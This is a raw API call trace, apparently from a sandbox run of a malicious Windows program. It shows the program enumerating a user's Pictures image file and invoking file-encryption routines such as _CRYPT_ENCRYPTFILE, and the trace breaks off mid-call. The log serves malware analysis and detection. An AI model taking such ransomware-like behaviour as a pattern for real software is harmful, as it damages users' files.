[0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0191.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.578] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.579] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.579] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0x90add8 [0191.579] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.579] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.579] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0x90add8 [0191.579] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.580] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qdzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dzhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zhTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hTNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TNRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NRtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RtUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tUaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UaAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aAFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FIidK.bmp\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.582] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.582] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.582] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.582] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0191.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0191.583] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.583] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.583] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.583] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.583] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.583] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cfdcdb0, ftCreationTime.dwHighDateTime=0x1d5e4d7, ftLastAccessTime.dwLowDateTime=0xf6dd40e0, ftLastAccessTime.dwHighDateTime=0x1d5e2b9, ftLastWriteTime.dwLowDateTime=0xf6dd40e0, ftLastWriteTime.dwHighDateTime=0x1d5e2b9, nFileSizeHigh=0x0, nFileSizeLow=0xc3db, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="qdzhTNRtUaAFIidK.bmp", cAlternateFileName="QDZHTN~1.BMP")) returned 0x90ae18 [0191.583] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0191.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.583] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.583] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0191.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.584] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.584] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.584] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0191.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0191.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.585] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1970 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0191.585] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0191.586] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0191.586] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0191.586] PeekMessageW (in: 